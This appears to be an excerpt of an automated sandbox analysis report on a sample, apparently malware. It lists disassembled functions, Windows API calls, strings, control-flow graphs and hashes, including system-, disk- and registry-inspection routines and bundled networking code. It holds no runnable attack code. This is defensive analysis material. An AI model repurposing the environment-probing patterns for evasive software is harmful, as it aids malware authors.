                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                    • API String ID: 0-1590685507
                                                    • Opcode ID: a9802d2f20f504ebb27660564552b1487036ddc74a0ad28523d3df76394f2f1f
                                                    • Instruction ID: 66920e487e3d51771bf714ea28e703d3a07eaf1eb9912bd4e2be397fadbc5215
                                                    • Opcode Fuzzy Hash: a9802d2f20f504ebb27660564552b1487036ddc74a0ad28523d3df76394f2f1f
                                                    • Instruction Fuzzy Hash: 07C2BE31A043449FD724DF69C484B6AB7E1BFC9314F04866DEC989B2A2D779ED84CB81
                                                    Function 0077255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE ref: 00772579
                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 007725CC
                                                    • GetDriveTypeA.KERNELBASE ref: 00772647
                                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 0077267E
                                                    • KiUserCallbackDispatcher.NTDLL ref: 007727E2
                                                    • FindFirstFileW.KERNELBASE ref: 007728F8
                                                    • FindNextFileW.KERNELBASE ref: 0077291F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                    • String ID: ;%w$@$`
                                                    • API String ID: 3271271169-1385483555
                                                    • Opcode ID: b21f4d638ba8e51927fb62258613d74051304ff5710bdc6ec154e85e00cc86b0
                                                    • Instruction ID: 045247fe6981c08ab9184a9669da2759e46e5a0a28542b4dae5fec0fba527057
                                                    • Opcode Fuzzy Hash: b21f4d638ba8e51927fb62258613d74051304ff5710bdc6ec154e85e00cc86b0
                                                    • Instruction Fuzzy Hash: 9CD1C6B49047099FDB00EF68D5856AEBBF1BF44354F0089AEE5A8D7311E7349A88CF52
                                                    Function 007729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1267 7729ff-772a2f FindFirstFileA 1268 772a31-772a36 1267->1268 1269 772a38 1267->1269 1270 772a3d-772a91 call bfee90 call bfef20 RegOpenKeyExA 1268->1270 1269->1270 1275 772a93-772a98 1270->1275 1276 772a9a 1270->1276 1277 772a9f-772b0c call bfee90 call bfef20 CharUpperA call af8da0 1275->1277 1276->1277 1285 772b15 1277->1285 1286 772b0e-772b13 1277->1286 1287 772b1a-772b92 call bfee90 call bfef20 call af8e80 call af8e70 1285->1287 1286->1287 1296 772b94-772ba3 1287->1296 1297 772bcc-772c66 QueryFullProcessImageNameA CloseHandle call af8da0 1287->1297 1300 772ba5-772bae 1296->1300 1301 772bb0-772bca call af8e68 1296->1301 1307 772c6f 1297->1307 1308 772c68-772c6d 1297->1308 1300->1297 1301->1296 1301->1297 1309 772c74-772ce9 call bfee90 call bfef20 call af8e80 call af8e70 1307->1309 1308->1309 1318 772dcf-772e1c call bfee90 call bfef20 CloseHandle 1309->1318 1319 772cef-772d49 call af8bb0 call af8da0 1309->1319 1328 772e23-772e2e 1318->1328 1332 772d4b-772d63 call af8da0 1319->1332 1333 772d99-772dad 1319->1333 1330 772e37 1328->1330 1331 772e30-772e35 1328->1331 1334 772e3c-772ed6 call bfee90 call bfef20 1330->1334 1331->1334 1332->1333 1339 772d65-772d7d call af8da0 1332->1339 1333->1318 1349 772eea 1334->1349 1350 772ed8-772ee1 1334->1350 1339->1333 1345 772d7f-772d97 call af8da0 1339->1345 1345->1333 1351 772daf-772dc9 call af8e68 1345->1351 1353 772eef-772f16 call bfee90 call bfef20 1349->1353 1350->1349 1352 772ee3-772ee8 1350->1352 1351->1318 1351->1319 1352->1353
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                    • String ID: 0
                                                    • API String ID: 2406880114-4108050209
                                                    • Opcode ID: 7795d1ad01c8cf9000b7d82ec645b9c4e11c506ae26fdf346dc212f7014d8f6d
                                                    • Instruction ID: 17ada0a5eed7a0491e7795d278e9336e7fa2b027098d4eb00232bbd84eda9773
                                                    • Opcode Fuzzy Hash: 7795d1ad01c8cf9000b7d82ec645b9c4e11c506ae26fdf346dc212f7014d8f6d
                                                    • Instruction Fuzzy Hash: 80E128B0904309DFCB10EF68D9856ADBBF5AF44344F00886AE998DB351E778D989CF52
                                                    Function 007805B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1507 7805b0-7805b7 1508 7805bd-7805d4 1507->1508 1509 7807ee 1507->1509 1510 7805da-7805e6 1508->1510 1511 7807e7-7807ed 1508->1511 1510->1511 1512 7805ec-7805f0 1510->1512 1511->1509 1513 7805f6-780620 call 787350 call 7770b0 1512->1513 1514 7807c7-7807cc 1512->1514 1519 78066a-78068c call 7adec0 1513->1519 1520 780622-780624 1513->1520 1514->1511 1526 780692-7806a0 1519->1526 1527 7807d6-7807e3 call 787380 1519->1527 1521 780630-780655 call 7770d0 call 7803c0 call 787450 1520->1521 1547 78065b-780668 call 7770e0 1521->1547 1548 7807ce 1521->1548 1530 7806a2-7806a4 1526->1530 1531 7806f4-7806f6 1526->1531 1527->1511 1536 7806b0-7806e4 call 7873b0 1530->1536 1533 7806fc-7806fe 1531->1533 1534 7807ef-78082b call 783000 1531->1534 1539 78072c-780754 1533->1539 1551 780a2f-780a35 1534->1551 1552 780831-780837 1534->1552 1536->1527 1546 7806ea-7806ee 1536->1546 1543 78075f-78078b 1539->1543 1544 780756-78075b 1539->1544 1562 780700-780703 1543->1562 1563 780791-780796 1543->1563 1549 78075d 1544->1549 1550 780707-780719 WSAEventSelect 1544->1550 1546->1536 1553 7806f0 1546->1553 1547->1519 1547->1521 1548->1527 1558 780723-780726 1549->1558 1550->1527 1557 78071f 1550->1557 1554 780a3c-780a52 1551->1554 1555 780a37-780a3a 1551->1555 1560 780839-78084c call 786fa0 1552->1560 1561 780861-78087e 1552->1561 1553->1531 1554->1527 1565 780a58-780a81 call 782f10 1554->1565 1555->1554 1557->1558 1558->1534 1558->1539 1572 780a9c-780aa4 1560->1572 1573 780852 1560->1573 1574 780882-78088d 1561->1574 1562->1550 1563->1562 1567 78079c-7807c2 call 7776a0 1563->1567 1565->1527 1580 780a87-780a97 call 786df0 1565->1580 1567->1562 1572->1527 1573->1561 1577 780854-78085f 1573->1577 1578 780970-780975 1574->1578 1579 780893-7808b1 1574->1579 1577->1574 1581 780a19-780a2c 1578->1581 1582 78097b-780989 call 7770b0 1578->1582 1583 7808c8-7808f7 1579->1583 1580->1527 1581->1551 1582->1581 1590 78098f-78099e 1582->1590 1591 7808f9-7808fb 1583->1591 1592 7808fd-780925 1583->1592 1593 7809b0-7809c1 call 7770d0 1590->1593 1594 780928-78093f 1591->1594 1592->1594 1600 7809a0-7809ae call 7770e0 1593->1600 1601 7809c3-7809c7 1593->1601 1598 7808b3-7808c2 1594->1598 1599 780945-78096b 1594->1599 1598->1578 1598->1583 1599->1598 1600->1581 1600->1593 1603 7809e8-780a03 WSAEnumNetworkEvents 1601->1603 1604 7809d0-7809e6 WSAEventSelect 1603->1604 1605 780a05-780a17 1603->1605 1604->1600 1604->1603 1605->1604
                                                    APIs
                                                    • WSAEventSelect.WS2_32(?,?,?), ref: 00780711
                                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 007809DC
                                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 007809FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: EventSelect$EnumEventsNetwork
                                                    • String ID: N=w$multi.c
                                                    • API String ID: 2170980988-182558092
                                                    • Opcode ID: ea2a9b18c8ee74353627c7c9f85a050a819890120e33645f5da6314b37605f78
                                                    • Instruction ID: 0bef525b61cc46488b44fc9e771729cdd10786cef227bef29a9ec1b3ce28bd29
                                                    • Opcode Fuzzy Hash: ea2a9b18c8ee74353627c7c9f85a050a819890120e33645f5da6314b37605f78
                                                    • Instruction Fuzzy Hash: 97D1E2716483019FEB50EF24C885BAB77E5FF94344F04882CF88596252E778E948CB92
                                                    Function 0083B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1678 83b180-83b195 1679 83b3e0-83b3e7 1678->1679 1680 83b19b-83b1a2 1678->1680 1681 83b1b0-83b1b9 1680->1681 1681->1681 1682 83b1bb-83b1bd 1681->1682 1682->1679 1683 83b1c3-83b1d0 1682->1683 1685 83b1d6-83b1f2 1683->1685 1686 83b3db 1683->1686 1687 83b229-83b22d 1685->1687 1686->1679 1688 83b233-83b246 1687->1688 1689 83b3e8-83b417 1687->1689 1690 83b260-83b264 1688->1690 1691 83b248-83b24b 1688->1691 1696 83b582-83b589 1689->1696 1697 83b41d-83b429 1689->1697 1693 83b269-83b286 call 83af30 1690->1693 1694 83b215-83b223 1691->1694 1695 83b24d-83b256 1691->1695 1706 83b2f0-83b301 1693->1706 1707 83b288-83b2a3 call 83b060 1693->1707 1694->1687 1699 83b315-83b33c call af8b00 1694->1699 1695->1693 1701 83b435-83b44c call 83b590 1697->1701 1702 83b42b-83b433 call 83b590 1697->1702 1709 83b342-83b347 1699->1709 1710 83b3bf-83b3ca 1699->1710 1717 83b458-83b471 call 83b590 1701->1717 1718 83b44e-83b456 call 83b590 1701->1718 1702->1701 1706->1694 1727 83b307-83b310 1706->1727 1723 83b200-83b213 call 83b020 1707->1723 1724 83b2a9-83b2c7 getsockname call 83b020 1707->1724 1714 83b384-83b38f 1709->1714 1715 83b349-83b358 1709->1715 1719 83b3cc-83b3d9 1710->1719 1714->1710 1722 83b391-83b3a5 1714->1722 1721 83b360-83b382 1715->1721 1736 83b473-83b487 1717->1736 1737 83b48c-83b4a7 1717->1737 1718->1717 1719->1679 1721->1714 1721->1721 1728 83b3b0-83b3bd 1722->1728 1723->1694 1734 83b2cc-83b2dd 1724->1734 1727->1719 1728->1710 1728->1728 1734->1694 1740 83b2e3 1734->1740 1736->1696 1738 83b4b3-83b4cb call 83b660 1737->1738 1739 83b4a9-83b4b1 call 83b660 1737->1739 1745 83b4d9-83b4f5 call 83b660 1738->1745 1746 83b4cd-83b4d5 call 83b660 1738->1746 1739->1738 1740->1727 1751 83b4f7-83b50b 1745->1751 1752 83b50d-83b52b call 83b770 * 2 1745->1752 1746->1745 1751->1696 1752->1696 1757 83b52d-83b531 1752->1757 1758 83b533-83b53b 1757->1758 1759 83b580 1757->1759 1760 83b578-83b57e 1758->1760 1761 83b53d-83b547 1758->1761 1759->1696 1760->1696 1761->1760 1762 83b549-83b54d 1761->1762 1762->1760 1763 83b54f-83b558 1762->1763 1763->1760 1764 83b55a-83b576 call 83b870 * 2 1763->1764 1764->1696 1764->1760
                                                    APIs
                                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 0083B2B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                                    • API String ID: 3358416759-2430778319
                                                    • Opcode ID: 2bbbedd60b124468ffb94744d412898b485026e27a8dbb9bcbf07b5ea4fc8702
                                                    • Instruction ID: f105197ce30e8f26775d39a58f2e82900ff145747eb0ee75a21b68e50ff06504
                                                    • Opcode Fuzzy Hash: 2bbbedd60b124468ffb94744d412898b485026e27a8dbb9bcbf07b5ea4fc8702
                                                    • Instruction Fuzzy Hash: 47C15DB16052159FD718DF28C891A6A77E1FFC8314F048968EA49CB3A2D735ED45CBC1
                                                    Function 00786FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa2d2f3c5559bfb4697de35072854721f9c297475a1a2127e46a49dfd833045f
                                                    • Instruction ID: 29f378974553375e84de7a132177709a6e06ce142c454e87d0fc319a338de7d7
                                                    • Opcode Fuzzy Hash: fa2d2f3c5559bfb4697de35072854721f9c297475a1a2127e46a49dfd833045f
                                                    • Instruction Fuzzy Hash: DE91E43064D3498BD739AA2888947BB72D5EFC4360F348B2CE8AA471D4EB79DC40D791
                                                    Function 0083A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0082712E,?,?,?,00001001,00000000), ref: 0083A90D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: recvfrom
                                                    • String ID:
                                                    • API String ID: 846543921-0
                                                    • Opcode ID: bc1d281dab4722c8db32bc410bbaab7c6f20365b27b18e0d3d61482b6a2aa296
                                                    • Instruction ID: 2bd84377653277c5aa3d2edde589d3feb507c50ae3cdf350cc3803f6deecb3eb
                                                    • Opcode Fuzzy Hash: bc1d281dab4722c8db32bc410bbaab7c6f20365b27b18e0d3d61482b6a2aa296
                                                    • Instruction Fuzzy Hash: 13F04975208308AFD2149B01DC84E6BBBEDFBC9758F05895DFD98232118270AE108AB2
                                                    Function 0082A440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0082A499
                                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0082A4FB
                                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0082A531
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0082AA19
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0082AA4C
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0082AA97
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0082AAE9
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0082AB30
                                                    • RegCloseKey.KERNELBASE(?), ref: 0082AB6A
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0082AB82
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0082AC46
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0082AD0A
                                                    • RegEnumKeyExA.KERNELBASE ref: 0082AD8D
                                                    • RegCloseKey.KERNELBASE(?), ref: 0082ADD9
                                                    • RegEnumKeyExA.KERNELBASE ref: 0082AE08
                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0082AE2A
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0082AE54
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0082AF63
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0082AFB2
                                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0082B072
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
